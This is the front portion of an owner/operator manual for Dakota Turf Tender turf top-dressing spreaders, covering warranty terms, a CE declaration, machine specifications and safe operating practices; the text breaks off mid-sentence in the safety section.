factory functions is a way to create new instances of mutable types as default values for fields: @dataclass class D: x: list = field(default_factory=list) assert D().x is not D().x Module level helper functions fields(class_or_instance): Returns a tuple of Field objects that define the fields for this Data Class. Accepts either a Data Class, or an instance of a Data Class. Raises ValueError if not passed a Data Class or instance of one. Does not return pseudo-fields which are ClassVar or InitVar. asdict(instance, *, dict_factory=dict): Converts the Data Class instance to a dict (by using the factory function dict_factory). Each Data Class is converted to a dict of its fields, as name:value pairs. Data Classes, dicts, lists, and tuples are recursed into. For example: @dataclass class Point: x: int y: int @dataclass class C: l: List[Point] p = Point(10, 20) assert asdict(p) == {'x': 10, 'y': 20} c = C([Point(0, 0), Point(10, 4)]) assert asdict(c) == {'l': [{'x': 0, 'y': 0}, {'x': 10, 'y': 4}]} Raises TypeError if instance is not a Data Class instance. astuple(*, tuple_factory=tuple): Converts the Data Class instance to a tuple (by using the factory function tuple_factory). Each Data Class is converted to a tuple of its field values. Data Classes, dicts, lists, and tuples are recursed into. Continuing from the previous example: assert astuple(p) == (10, 20) assert astuple(c) == ([(0, 0), (10, 4)],) Raises TypeError if instance is not a Data Class instance. make_dataclass(cls_name, fields, *, bases=(), namespace=None): Creates a new Data Class with name cls_name, fields as defined in fields, base classes as given in bases, and initialized with a namespace as given in namespace. This function is not strictly required, because any Python mechanism for creating a new class with __annotations__ can then apply the dataclass function to convert that class to a Data Class. This function is provided as a convenience. For example: C = make_dataclass('C', [('x', int), ('y', int, field(default=5))], namespace={'add_one': lambda self: self.x + 1}) Is equivalent to: @dataclass class C: x: int y: int = 5 def add_one(self): return self.x + 1 replace(instance, **changes): Creates a new object of the same type of instance, replacing fields with values from changes. If instance is not a Data Class, raises TypeError. If values in changes do not specify fields, raises TypeError. The newly returned object is created by calling the __init__ method of the Data Class. This ensures that __post_init__, if present, is also called. Init-only variables without default values, if any exist, must be specified on the call to replace so that they can be passed to __init__ and __post_init__. It is an error for changes to contain any fields that are defined as having init=False. A ValueError will be raised in this case. Be forewarned about how init=False fields work during a call to replace(). They are not copied from the source object, but rather are initialized in __post_init__(), if they're initialized at all. It is expected that init=False fields will be rarely and judiciously used. If they are used, it might be wise to have alternate class constructors, or perhaps a custom replace() (or similarly named) method which handles instance copying. Discussion python-ideas discussion This discussion started on python-ideas [9] and was moved to a GitHub repo [11]. Why not just use namedtuple? Any namedtuple can be accidentally compared to any other with the same number of fields. For example: Point3D(2017, 6, 2) == Date(2017, 6, 2). With Data Classes, this would return False. A namedtuple can be accidentally. Cannot support combining fields by inheritance. Why not just use typing.NamedTuple? For classes with statically defined fields, it does support similar syntax to Data Classes, using type annotations. This produces a namedtuple, so it shares namedtuples benefits and some of its downsides. Data Classes, unlike typing.NamedTuple, support combining fields via inheritance. [12]. post-init parameters In an earlier version of this PEP before InitVar was added, the post-init function __post_init__ never took any parameters. The normal way of doing parameterized initialization (and not just with Data Classes) is to provide an alternate classmethod constructor. For example: @dataclass class C: x: int @classmethod def from_file(cls, filename): with open(filename) as fl: file_value = int(fl.read()) return C(file_value) c = C.from_file('file.txt') Because the __post_init__ function is the last thing called in the generated __init__, having a classmethod constructor (which can also execute code immmediately after constructing the object) is functionally equivalent to being able to pass parameters to a __post_init__ function. With InitVars, __post_init__ functions can now take parameters. They are passed first to __init__ which passes them to __post_init__ where user code can use them as needed. The only real difference between alternate classmethod constructors and InitVar pseudo-fields is in regards to required non-field parameters during object creation. With InitVars, using __init__ and the module-level replace() function InitVars must always be specified. Consider the case where a context object is needed to create an instance, but isn't stored as a field. With alternate classmethod constructors the context parameter is always optional, because you could still create the object by going through __init__ (unless you suppress its creation). Which approach is more appropriate will be application-specific, but both approaches are supported. Another reason for using InitVar fields is that the class author can control the order of __init__ parameters. This is especially important with regular fields and InitVar fields that have default values, as all fields with defaults must come after all fields without defaults. A previous design had all init-only fields coming after regular fields. This meant that if any field had a default value, then all init-only fields would have to have defaults values, too. asdict and astuple function names The names of the module-level helper functions asdict() and astuple() are arguably not PEP 8 compliant, and should be as_dict() and as_tuple(), respectively. However, after discussion [13] it was decided to keep consistency with namedtuple._asdict() and attr.asdict(). Rejected ideas Copying init=False fields after new object creation in replace() Fields that are init=False are by definition not passed to __init__, but instead are initialized with a default value, or by calling a default factory function in __init__, or by code in __post_init__. A previous version of this PEP specified that init=False fields would be copied from the source object to the newly created object after __init__ returned, but that was deemed to be inconsistent with using __init__ and __post_init__ to initialize the new object. For example, consider this case: @dataclass class Square: length: float area: float = field(init=False, default=0.0) def __post_init__(self): self.area = self.length * self.length s1 = Square(1.0) s2 = replace(s1, length=2.0) If init=False fields were copied from the source to the destination object after __post_init__ is run, then s2 would end up begin Square(length=2.0, area=1.0), instead of the correct Square(length=2.0, area=4.0). Automatically [14]. Providing isdataclass() An earlier version of this PEP defined an isdataclass(obj) helper function. However, there was no known use case for this, and there was debate on whether it should return True for instances or classes or both. In the end, isdataclass() was removed. The supported way of writing a function that checks if an object is a dataclass instance or class is: def isdataclass(obj): try: dataclasses.fields(obj) return True except TypeError: return False If needed, a further check for isinstance(obj, type) can be added to discern if obj is a class. Examples Custom __init__ method Sometimes the generated __init__ method does not suffice. For example, suppose you wanted to have an object to store *args and **kwargs: @dataclass(init=False) class ArgHolder: args: List[Any] kwargs: Mapping[Any, Any] def __init__(self, *args, **kwargs): self.args = args self.kwargs = kwargs a = ArgHolder(1, 2, three=3) A complicated example[Requirement] constraints: Dict[str, str] = field(default_factory=dict).
https://www.python.org/dev/peps/pep-0557/?source=TruthAndBeauty
CC-MAIN-2017-51
refinedweb
2,614
56.45
Inside the play game method, each player should take a series of turns. Here is where you should right the logic to compare whether player1 or player2 won each turn. After turns have been taken, return the winner of the game. Since you now know loops, you can add logic into playGame() that makes a game involve multiple turns. Code that I have: WarPlayer class: import java.util.Scanner; import java.util.Random; public class WarPlayer { private boolean user; //True if player is not a computer. public WarPlayer(boolean isComputer) { user = ! isComputer; } public boolean takeTurn() { if(! user) { Random r = new Random(); int A = 0; int J = 10; int Q = 11; int K = 12; r.nextInt(12); } else { Scanner sc = new Scanner(System.in); String input = sc.nextLine(); } return true; } } WarGame class public class WarGame { private WarPlayer player1; private WarPlayer player2; public WarGame(boolean player1, boolean player2) { this.player1 = new WarPlayer(player1); this.player2 = new WarPlayer(player2); } public void playGame() { player1.takeTurn(); player2.takeTurn(); } } public class GameTesterClass { public static void main(String[] args) { WarPlayer player1 = new WarPlayer(true); WarPlayer player2 = new WarPlayer(true); } } I just want to know a little bit of code for the play game method that tells whoever has the highest card (A, 2-9, J, Q, K) wins. Thanks
http://www.dreamincode.net/forums/topic/253848-warplayer-card-game-help/
CC-MAIN-2013-20
refinedweb
212
67.86
Advanced, and a new coding scheme. This warning message is printed by the shared library of TensorFlow. As the message indicates, the shared library doesn’t include the kind of instructions that your CPU could use. What Causes this Warning? After TensorFlow 1.6, the binaries now use AVX instructions which may not run on older CPUs anymore. So the older CPUs will be unable to run the AVX, while for the newer ones, the user needs to build the tensorflow from source for their CPU. Below is all the information you need to know about this particular warning. Also, a method about getting rid of this warning for future use. What does the AVX do? In particular, the AVX introduced the FMA (Fused multiply-add); which is the floating-point multiply-add operation, and this all operation is done in a single step. This helps speed up many operations without any problem. It makes the algebra computation more fast and easy use, also the dot-product, matrix multiply, convolution, etc. And these are all the most used and basic operations for every machine-learning training. The CPUs that support the AVX and FMA will be far faster than the older ones. But the warning states that your CPU supports AVX, so it’s a good point. Why it isn’t used by default? That is because the TensorFlow default distribution is built without the CPU extensions. By CPU extensions it states the AVX, AVX2, FMA, etc. The instructions which trigger this issue are not enabled by default on the available default builds. The reasons they are not enabled is to make this more compatible with as many CPUs as possible. Also to compare these extensions, they are a lot slower in CPU rather than GPU. CPU is used on the small-scale machine-learning while the use of GPU is expected when it is used for a medium or large-scale machine-learning training. Fixing the Warning! These warnings are just simple messages. The purpose of these warnings is to inform you about the built TensorFlow from source. When you build the TensorFlow from the source it can be faster on the machine. So all these warnings are telling you about is the build up TensorFlow from source. If you have a GPU on your machine, then you can ignore these warnings from AVX support. Because most expensive ones will be dispatched on a GPU device. And if you want to not see this error anymore, you can just simply ignore it by adding this: import the OS module in your main program code and also set the mapping object for it # For disabling the warning import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' But if you are on a Unix, then use the export command in bash shell export TF_CPP_MIN_LOG_LEVEL=2 But if don’t have GPU, and you want to use your CPU as much as possible, you should build TensorFlow from the source optimized for your CPU with AVX, AVX2, and FMA enabled here.
https://appuals.com/fix-your-cpu-supports-instructions-that-this-tensorflow-binary-was-not-compiled-to-use-avx2/
CC-MAIN-2021-25
refinedweb
506
72.87
Quoting rbb@rkbloom.net: > I am torn about this. On the one hand, a simple single test for this > condition is useful. However, EEXIST and ENOTEMPTY just don't sound like > the same thing, so having one macro that checks for both doesn't make > sense. Does anybody have a strong opinion one way or the other? If ENOTEMPTY can _only_ be returned by rmdir on a non-empty dir, and if rmdir can return EEXIST _only_ if the directory isn't empty, then of course it makes sense to combine the tests, and Joe's patch is correct. Otherwise, the apr_dir_remove implementation should convert EEXIST to ENOTEMPTY ona per-platform basis. We definitely have to do something so that users don't have to check for both EEXIST and ENOTEMPTY after trying to remove a dir; after all, APR is supposed to hide platform differences. This situation is analogous to the APR_ENOENT vs. APR_ENOTDIR one on Windows, which we solved by having APR_STATUS_IS_ENOTDIR chaeck one of the same codes as APR_STATUS_IS_ENOENT. Brane > > Ryan > > On Fri, 15 Nov 2002, Joe Orton wrote: > > > On some platforms rmdir(2) fails with EEXIST rather than ENOTEMPTY > when > > trying to delete a non-empty directory; in fact POSIX specifies that > > both EEXIST and ENOTEMPTY are allowed for this case. > > > > The test_removeall_fail() test uses APR_STATUS_IS_ENOTEMPTY() for > this > > case. Is it okay to extend APR_STATUS_IS_ENOTEMPTY to return true > for > > EEXIST for this case (as below), or should the test be changed? > > > > --- include/apr_errno.h 10 Nov 2002 08:35:16 -0000 1.101 > > +++ include/apr_errno.h 15 Nov 2002 14:02:55 -0000 > > @@ -1202,7 +1202,8 @@ > > /** cross device link */ > > #define APR_STATUS_IS_EXDEV(s) ((s) == APR_EXDEV) > > /** Directory Not Empty */ > > -#define APR_STATUS_IS_ENOTEMPTY(s) ((s) == APR_ENOTEMPTY) > > +#define APR_STATUS_IS_ENOTEMPTY(s) ((s) == APR_ENOTEMPTY \ > > + (s) == APR_EEXIST) > > > > #endif /* !def OS2 || WIN32 */
http://mail-archives.apache.org/mod_mbox/apr-dev/200211.mbox/%3C1037393100.3dd55ccc3b795@www.xbc.nu%3E
CC-MAIN-2018-43
refinedweb
298
61.46
Making money and panicing By binujp on Mar 06, 2008 Last week I was going through a gargantuan depression triggered by economic depression and realization that life is not fair and that everyone and everything is mortal. I lurked around like a an unhappy pumpkin till I got Terry Pratchett's latest - "Making Money". It put a smile on my face the moment I felt it in my hand. I finished the book cackling, laughing and giggling while maintaining the unhappy pumpkin look. "Recursive premonition" caused me some thought. There were some almost page turning moments towards the end. Overall not as good as Thud! even, enjoyable if you are a fan. Finished it sans unhappy pumpkin face. Then it hit me that I should be further depressed due to the "embuggerance" Terry was diagnosed with. That should have tickled the mortality factor of my depression. That didn't happen and once again a Pratchett creation worked for me as the perfect anti-depressant. I am now fit enough to tackle bugs that should not exist in the first place. The current one is that Solaris tries it's utmost to write dirty pages after panic. The comment in zfs_sync tells the problem as it is. /\*ARGSUSED\*/ int zfs_sync(vfs_t \*vfsp, short flag, cred_t \*cr) { /\* \* Data integrity is job one. We don't want a compromised kernel \* writing to the storage pool, so we never sync during panic. \*/ if (panicstr) return (0); ... That is not the only problem. After a panic there is only one cpu running threads and there is no pre-emption. Perfectly normal calls like mutex_enter() and delay() will behave differently after a panic. Understandable. But does panic code account for all that? No! usr/src/uts/common/os/panic.c:panicsys() It first asks filesystems to sync() by calling vfs_sync on all mounted file systems. I can work around by returning immediately if a panic is in progress as ZFS does. Added that to PxFS. But panic is not done. It calls pageout on every dirty page. To workaround I have to add the same panic-check in pxfs's putpage. Did that and the bug is fixed. But why? Why would you want pages from a compromised and hobbled system to be written out? With a non-local filesystem almost nothing works. You can't trust the data any more. System behavior after panic is different enough to not trust locks and timeouts. My conclusion is this is a throwback from the age of no-logging in ufs and pushing out pages at panic was needed to avoid file system corruption.
https://blogs.oracle.com/binujp/entry/making_money_and_panicing
CC-MAIN-2014-15
refinedweb
436
67.45
Type: Posts; User: aamir121a Thank you all for posting this is strictly a c code ( so no classes ) problem comes from the fact pms.h in included in pms_courses.h and pms_program.h and the are included in pms.h . ( hence the circular dependency )... Hi , I was doing Uni assignment ( not looking for a full solution ) had to use the start up code provided ( other wise this issue would not have come ), when compiling the source I get the... Hi Laserlight , in the line above it is declared as struct NODE node , what i want to draw your attention to is problem seems to be solved when I add struct NODE { char val; int ... I am developing a double linked list in C ( development environment ) is QT with mingw32 4.7 gcc / g++ compiler , in the header file I have defined struct as follows #ifndef... hi , you can get one here it is C++ implementation Thank you john and OReubens I am using VS 2008 , however you are right when I cleaned the project and rebuild it does not work. ( however your code works fine ) however I still don't understand why template are being... Some reading through C++ code I come across template deceleration without any type , I have tested the code it compiles too template<> class abc { } similarly template usage They are dime a dozen just do a search on soruceforge , however just be aware that the more established one are easy to use with much more documentation and tutorials. The only difference with Windows API is the Alpha channel is at the very end RGBA , as oppose to QT or C++ Builder XE2 ( from Embarcadero )where is is ARGB Thank you OReubens thanks Victor , however I was more interested in how it was done in the first place , I meant better solution than union. I am currently working with win32 API , for image processing, one of the windows function returns RGBA ( colors ) as unsigned int , I then split it into individual bytes by creating a union... I was think of spiting a large W by H image into of 4 or 8 smaller images and running them in separate threads , in that case function would return a pointer to pointer array , with... thank you Paul , ( I have always found this concept to be a bit confusing ) I was doing for a QT project , which involves comparing pixel Data ( QImage ) for two image with the same... Sorry Paul I can't remember , it was a while a ago , it be great if you can post the fast and corrected version of the above code , when it comes to pointer to pointers I get confused. Thank you. please post the relevant corrections I have the following code which I got through one of the posts here #ifndef TDYNAMICARRAY_H #define TDYNAMICARRAY_H namespace Massive { template<class T> T... thank you Could someone please explain the C/C++ keyword ' extern ' , and it use , if possible please post some example. thank you I wish to convert a 2D Array i.e int a[20][20] , convert to either s single array as in in[400] or hold it in a vector , and then back again , any ideas ? my initial thoughts were ... I have always used iterator as it++ , I which to understand what effect does ++it has as oppose to it++ , where it being the iterator. it is not pattern matching , more data validation , thank you for your post , I actually did this with boost::lexical_cast , throws an exception if the required value is neither float or a...
http://forums.codeguru.com/search.php?s=8f50e37dccda4ef00c09f69f2f47f5ba&searchid=5104443
CC-MAIN-2014-41
refinedweb
595
63.83
DAKOTA™ TURF TENDER OWNER / OPERATOR’S MANUAL This manual is to be considered a permanent part of this Turf Tender and must remain with the Turf Tender at all times. Replacement manuals may be ordered through an Authorized Dakota dealer. Copyright 2005 Dakota Peat and Equipment, Inc. p/n 13750 1 WARRANTY DAKOTA PEAT & EQUIPMENT is hereinafter called DAKOTA™. (A) Warranty. DAKOTA™ warrants all products manufactured by it to be free from defects in material and manufactured at the time of shipment and for twelve (12) months from date of delivery to customer. DAKOTA™ will furnish to the dealer, without charge, f.o.b. East Grand Forks, Minnesota, replacements for such parts as DAKOTA™ finds to have been defective at the time of shipment; or at DAKOTA™’s option, will make or authorize repairs to such parts, provided that, upon request, such parts are returned, transportation prepaid, to the factory at East Grand Forks, Minnesota. This warranty shall not apply to any product that has been subjected to misuse, misapplication, neglect (including but not limited to improper maintenance), accident, improper installation, modification (including but not limited to use of unauthorized parts or attachments), adjustment, or repair. Engines, motors, and any accessories furnished with DAKOTA™’s products, but which are not manufactured by DAKOTA™, are not warranted by DAKOTA™ but are sold only with the express warranty, if any, of the manufacturers thereof. THE FOREGOING IS IN LIEU OF ALL OTHER WARRANTIES, WHETHER EXPRESS OR IMPLIED (INCLUDING THOSE OF MERCHANTABILITY AND FITNESS OF ANY PRODUCT FOR A PARTICULAR PURPOSE), AND OF ANY OTHER OBLIGATION OF LIABILITY ON THE PART OF DAKOTA. (B) Limitation of Liability. It is expressly understood that DAKOTA™’s liability for its products, whether due to breach of warranty, negligence, strict liability, or otherwise, is limited to the furnishing of such replacement parts, and DAKOTA™ will not be liable for any other injury, loss,, DAKOTA™’s products. Any operation expressly prohibited in the operating instructions or manuals furnished with the machine, or any adjustment, or assembly procedure not recommended or authorized in the operating or service instructions shall void such warranty. (C) Registration. THIS WARRANTY IS VOID UNLESS YOUR DEALER COMPLETED AND RETURNED A “NEW PRODUCT REGISTRATION AND WARRANTY” CARD TO DAKOTA™ WITHIN 30 DAYS AFTER DELIVERY OF UNIT TO CUSTOMER. PLEASE COMPLETE AND RETURN THE NEW PRODUCT REGISTRATION AND WARRANTY CARD, LOCATED AT THE END OF THIS MANUAL, IF YOU FEEL YOUR DEALER MAY NOT HAVE COMPLETED ONE FOR YOU AT THE TIME OF DELIVERY. No Parts shall be returned under warranty unless a Return Goods Authorization (RGA) is obtained from DAKOTA™. ALWAYS GIVE PART NAME, NUMBER AND MACHINE SERIAL NUMBER WHEN ORDERING PARTS. NOTE: DAKOTA reserves the right to make changes to design or construction without obligation to incorporate such changes in equipment previously sold. The tire manufacturer’s warranty supplied with your Turf Tender may not apply outside the U.S. YOUR DEALER IS RESPONSIBLE FOR COMPLETION OF THE PRODUCT REGISTRATION CARD AND RETURNING IT TO DAKOTA AS SOON AS YOU TAKE DELIVERY OF YOUR TURF TENDER. PLEASE REFER TO THE “WARRANTY” SECTION FOR ADDITIONAL INFORMATION. D) Parts, Service, and Warranty n o i t ra 30 t s i reg ithin e th in w f i ed sent i n de not e l b rd is l i y w ty ca y. t n rra arran eliver a W w er d and s aft day Contact your local dealer for parts, service, and warranty. 2 Warranty TABLE OF CONTENTS Warranty ........................................................................................................................................................ 2 Ce Declaration Of Conformity ..................................................................................................................... 4 Specifications .................................................................................................................................................. 5 Safe Operational Practices ............................................................................................................................ 6 Before Operating ................................................................................................................................. 6 While Operating .................................................................................................................................. 6 Loading ................................................................................................................................................ 7 General Information...................................................................................................................................... 8 Labeling And Terminology .................................................................................................................. 8 Authorized Maintenance...................................................................................................................... 8 Unload Hopper Prior To Doing Maintenance ...................................................................................... 8 Power Off Maintenance And Adjustments .......................................................................................... 8 Tires ..................................................................................................................................................... 8 Maintain Safe Operating Conditions ................................................................................................... 8 Relieve Hydraulic Pressure .................................................................................................................. 8 Keep Turf Tender Clean ....................................................................................................................... 8 Replacement Parts ............................................................................................................................... 8 Safety And Instruction Decals ............................................................................................................. 9 Setup ............................................................................................................................................................. 10 Trailer-type Turf Tenders ................................................................................................................... 10 Mounted-type 410T Turf Tenders ...................................................................................................... 11 Self-contained Turf Tenders............................................................................................................... 14 Operation ...................................................................................................................................................... 15 Safety Inspection................................................................................................................................ 15 Hooking To The Tractor (Trailer Models) ......................................................................................... 16 Unhooking From The Tractor (Trailer Models) ................................................................................. 17 Hopper Conveyor Belt System .......................................................................................................... 18 Side Conveyor ................................................................................................................................... 19 Hydraulic Rear Door (Optional) ........................................................................................................ 20 Rear Metering Gate ........................................................................................................................... 21 Front Gate .......................................................................................................................................... 21 Electric Vibrator................................................................................................................................. 22 Dual Spinner System ......................................................................................................................... 22 Spinner Assembly .............................................................................................................................. 23 Spread Patterns And Adjustments ..................................................................................................... 24 Application Rates .............................................................................................................................. 27 Electric Brakes ................................................................................................................................... 27 Maintenance ................................................................................................................................................. 29 Running Gear (Trailer-type Models) ................................................................................................. 29 Electric Brakes ................................................................................................................................... 31 Hopper Conveyor Belt ....................................................................................................................... 33 Side Conveyor ................................................................................................................................... 35 Dual Spinner Spreading System ........................................................................................................ 36 Electrical System ............................................................................................................................... 37 Hydraulic System ............................................................................................................................... 40 Storage .......................................................................................................................................................... 41 Lubrication Schedule .................................................................................................................................. 41 Troubleshooting ........................................................................................................................................... 42 Table of Contents 3 CE DECLARATION OF CONFORMITY Manufacturer’s Name: DAKOTA, Inc. Manufacturer’s Address: 833 Gateway Drive N.E. East Grand Forks, Minnesota 56721 Declares that the machinery described below complies with applicable essential health and safety requirements of Parts 1 and 4 and related clauses of Part 3 of Annex 1 of the Machinery Directive 98/37/EC. Description: DAKOTA TURF TENDER Model Numbers: Type 410, 411, 412, 414, 420, and 440 Options: Rear-Mount Spreader w/ Spinners, Electric Rear Door, 2 or 4 Electric Brakes, Vibrator, Turf Tires, Rear-Swing Conveyor Serial Number: ______________________________________ The following standards have either been referred to or been complied with, in part or in full, as relevant: EN 292 - 2 EN 294 EN 811 EN 953 EN 954-1 EN 60204-1 EN60947-3-1 SAE J1128 ASAE ASAE Machinery Safety Machinery Safety Machinery Safety Machinery Safety Machinery Safety Machinery Safety Electrical Safety Electrical SafetyMachine SafetyMachine Safety- Basic concepts, general principals for design – Part 2: Technical principals and specifications. Safety distances to prevent danger zones being reached by the upper limbs. Safety distances to prevent danger zones being reached by the lower limbs. General requirements for the design and construction of guards. Safety Related Parts of Control Systems – Part 1: General Principals for Design. Electrical Equipment of Machines. Switches Wire Tip Over Testing Brake Testing of Trailers Full Name of responsible person. Kevin Pierce Signature:__________________________________ Full Name of Authorized European Representative. Position: President, DAKOTA, Inc. Date:_________________ ____________________________ (Typed). Position ______________________ (Typed). Signature:_________________________________ Date:_________________ Original must remain with machine owner. EU representative (Dealer) must fax or send fully completed copy to DAKOTA, Inc. Fax number is 218-773-0701. YOUR DEALER IS RESPONSIBLE FOR COMPLETION OF THE NEW PRODUCT REGISTRATION CARD AND RETURNING IT TO DAKOTA™ AS SOON AS YOU TAKE DELIVERY OF YOUR MACHINE. PLEASE REFER TO THE “WARRANTY” SECTION FOR ADDITIONAL INFORMATION. IF YOU FEEL THAT A NEW PRODUCT REGISTRATION AND WARRANTY CARD WAS NOT COMPLETED AND MAILED IN, PLEASE COMPLETE THE WARRANTY CARD LOCATED AT THE BACK OF THIS MANUAL WITHIN 30 DAYS OF ACCEPTING DELIVERY. DAKOTA PEAT & EQUIPMENT 833 Gateway Drive NE East Grand Forks, Minnesota 56721 United States of America 4 CE DECLARATION OF CONFORMITY SPECIFICATIONS ITEM Model 410 Dimensions: Height: 54 in. (1.37 m) Length: 144 in. (3.66 m)* Width: 60 in. (1.52 m)* Hopper Capacity (level): 0.85 yd3 (0.65 m3) 2,250 lb (1023 kg) Rear Spinners: Model 411 Model 412 Model 414 Model 420 Model 440 54 in. (1.37 m) 144 in. (3.66 m) 60 in. (1.52 m) 67 in. (1.68 m) 144 in. (3.66 m) 81 in. (2.06 m) 79 in. (2.00 m) 188 in. (4.78 m) 96 in. (2.44 m) 67 in. (1.68 m) 172 in. (4.37 m) 81 in. (2.06 m) 79 in. (2.00 m) 192 in. (4.87 m) 96 in. (2.44 m) 0.85 yd3 (0.65 m3) 2,250 lb (1023 kg) 2 yd3 (1.53 m3) 6,000 lb (2700 kg) 4.2 yd3 (3.21 m3) 12,000 lb (5727 kg) 2 yd3 (1.53 m3) 6,000 lb (2700 kg) 4.2 yd3 (3.2 m3) 12,000 lb (5727 kg) Dual 24 in. (61 cm) Quick Change spinners Sand Spinners (white) Fertilizer Spinners (black) Grass Spinners (green) Spreading Width: Sand/Top Dressing Material Fertilizer: Seed: Top Dressing Speed: 12-40 ft (3.7-12.2 m) 12-40 ft (3.7-12.2 m) 25 ft (2.2 m) Variable to desired application rate 2 to 8 mph (3 to 13.9 kph) Maximum Transport Speed: Empty: 15 mph (24 kph) - Not for highway use. Loaded: Dependent on terrain conditions for safe operation. Hopper Conveyor: Rear Discharge Variable hydraulic speed control Spliced belt 18 in. (45.7 cm) wide belt Front and Rear Discharge Endless belt Metering Gate(s): Rear manual sliding Front & Rear sliding Tires (Trailer-Type Models): 26.5x14x12** Hydraulic System: 3-7 GPM (11.3-26.4 LPM) 2,000-2,500 PSI (138-172 Bar) Max. Shipping Weight (with standard equipment): 920 lb (418 Kg) 1400 lb (636 Kg) Gross Vehicle Weight: 3,170 lb (1441 Kg) 3,170 lb (1441 Kg) 33x20x16.1** 26.5x14x12** 33x16x16.1** 4-11 GPM (15.1-41.64 LPM) 2,500 PSI (172 Bar) Max. 1,825 lb (827) 3,000 lb (1361) 2,840 (1280 Kg) 3,300 lb (1500 Kg) 7,825 lb (3549 Kg) 13,000 lb (5897 Kg) 8,840 lb (4020 Kg) 15,900 lb (7227 Kg) * 410 mounted-type dimensions are: length - 103 in. (2.61 m); width - 54 in. (1.37 m); shipping weight - 780 lb (354 Kg). Trailer-type models with optional power unit, shipping weight - 1240 lb (563 Kg); gross vehicle weight - 3030 lb (1377 Kg). ** 4 ply, turf tread. Maximum Inflation Pressure of 18 PSI (124 kPa) for 26.5 in. tires and 22 PSI (152 kPa) for 33 in. tires. May be adjusted downward by user for specific application and loads. Ground Pressure: Approximately equal to tire’s inflation pressure plus 1 to 2 psi (this is the industry standard method for determination of ground pressure) MODEL #_______________ SERIAL #_____________________ SPECIFICATIONS 5 SAFE OPERATIONAL PRACTICES BEFORE OPERATING WHILE OPERATING Read Operator’s Manuals Prior to operating the Turf Tender, read and understand the contents of this Operator’s Manual and the Operator’s manual of vehicle either towing or carrying the Turf Tender. Become familiar with all control functions and know how to turn the vehicle off and stop effectively. REPLACEMENT MANUAL A replacement manual is available by sending complete Model and Serial Number to Dakota, Inc. 833 Gateway Drive, North East East Grand Forks, Minnesota 56721 Unauthorized Operators Never allow children to operate the Turf Tender. Do not allow anyone to operate the Turf Tender without proper instruction or training. Only trained and authorized persons should operate the Turf Tender. The operator is defined as being the person responsible for supervising the operation of the Turf Tender and driving the vehicle that either tows it or carries it. Drugs And Alcohol Never operate the Turf Tender when under the influence of drugs or alcohol. Shields And Safety Devices Keep all shields, guards, and safety devices in place. If a shield, guard, or safety device is damaged, replace or repair it prior to operating the Turf Tender. If a decal is illegible, order and install a new one. Vehicle Instructions Mounted-type Turf Tenders are designed to installed on either the Toro Workman® or the John Deere ProGator®. Refer to the Operator’s Manual for capacities, instructions, and precautions. WARNING Do not attempt to mount the Turf Tender on a model other than those listed. Never mount a Turf Tender on a vehicle that does not have the brakes, suspension, or frame strength to handle the load. Trailer-type Turf Tenders can be towed by most utility tractors with adequate brakes. The tractor pulling 410, 411, 412, and 420 models must have a drawbar hitch capacity to handle a 7825 lb (3556 Kg) trailer. The tractor pulling 414 and 440 models must have a drawbar hitch capacity to handle a 13,000 lb (5909 Kg) trailer. Refer to your Tractor Operator’s Manual for towing capacities, instructions, and precautions. WARNING Do not attempt to tow a loaded Turf Tender with a light utility vehicle or runabout. Never tow a Turf Tender with a vehicle that does not have the brakes, suspension, or frame strength to handle the load. When operating a Turf Tender equipped with electric brakes on hilly terrain, it is recommended to use the Turf Tender’s brakes in conjunction with the tow vehicle’s brakes. The fully loaded weight of the Turf Tender may be beyond the capacity of the just the tow vehicle’s brakes. Loose Fasteners And Fittings Confined Space Operation Although the Turf Tender has been designed so that components will not come loose during normal operation of the Turf Tender, always check the Turf Tender prior to start up and after each use for loose fasteners, fittings, connectors and other components. Tighten, repair, or replace as necessary. This includes electrical and hydraulic system components, also. Only use original DAKOTA replacement parts. Danger Zones Modifications To Turf Tender Do not modify the Turf Tender in any way. Modifying the Turf Tender will void the warranty. Safe Attire Do not operate the Turf Tender while wearing sandals, tennis shoes, sneakers, or shorts. Always wear long pants and substantial shoes. Do not wear loose fitting clothing which could get caught in control switches or moving parts. The wearing of safety glasses, safety shoes, hearing protection, and a hard hat is recommended and may be required by some ordinances and insurance regulations. 6 Do not run the vehicle’s engine in a confined area without sufficient ventilation. Exhaust fumes are hazardous and could possibly be deadly. The following danger zones exist in and around the Turf Tender: 1. A crush hazard exists in any area beneath the Turf Tender. 2. A hydraulic jet puncture hazard and hot oil burn hazard exists in any area within 6 feet (2 m) of a hydraulic hose due to the possibility of a puncture in a hose. 3. A projectile hazard exists in any area within a 100 foot (30 m) radius of the rear and sides of the Turf Tender. Rocks travel farther than sand during normal top dressing operations. 4. Entanglement, pinch, and cut hazards exist in any areas close to rotating and moving components such as conveyors and spinners. 5. A potential entrapment hazard exists within the hopper. 6. On trailer-type Turf Tenders, a crush hazard exists at the rear and an impact hazard exists at the front of the Turf Tender during loading or uncoupling if the load is not evenly distributed and balanced in front of the wheels due to the rear tipping down. Never load the Turf Tender when it is uncoupled from its tow vehicle. Never uncouple the Turf Tender when there is a load in the hopper. There is potential of the Turf Tender tipping backwards which could cause damage to the Turf Tender or injury or even death. SAFE OPERATIONAL PRACTICES 7. A crush hazard exists around the perimeter of the Turf Tender if operated on a slope exceeding either the vehicle’s or Turf Tender’s recommended maximum speed and operational angle (10° side to side and 26° front to back). 8. On the trailer-type Turf Tenders, a crush hazard exists due to the Turf Tender rolling if uncoupled from its tow vehicle. Always solidly chock both the front and rear of the outermost wheels before uncoupling from the tow vehicle. 9. On mounted-type Turf Tenders, a crush hazard exists beneath the hopper when it is raised to do maintenance on the vehicle. Always install the Safety Bar on the hoist ram to secure the hopper in the raised position. 10. On mounted-type Turf Tenders, a crush hazard exists beneath the hopper when removed from the vehicle in the storage position. Be sure the stands are properly installed and that no one is allowed beneath the hopper when in the storage position. For these reasons, the only person that is allowed to be near a loaded or operating Turf Tender is the operator seated in the driver’s position of the vehicle. You, the operator in control, are responsible for using good, safe judgment in the operation of the Turf Tender and ensuring that no one will be injured by it’s operation. Passengers Never carry passengers on this Turf Tender. The Turf Tender is not designed to carry anybody. Drive Carefully Using the Turf Tender demands attention to operation. Failure to operate the Turf Tender safely may result in an accident, tip over, or serious injury or death. To prevent tipping or loss of control: 1. Never exceed the tow (or carrier’s) vehicle’s load capacity. One of the most dangerous operations associated with the Turf Tender is attempting to haul or tow it with an undersized vehicle due to the vehicle’s limited traction and braking capacity. Exceeding the vehicle’s capacity may result in loss of control, damage, serious injury, or even death. Refer to your vehicle’s manual for load capacities and restrictions. Do not use the Toro Workman® and John Deere ProGator® 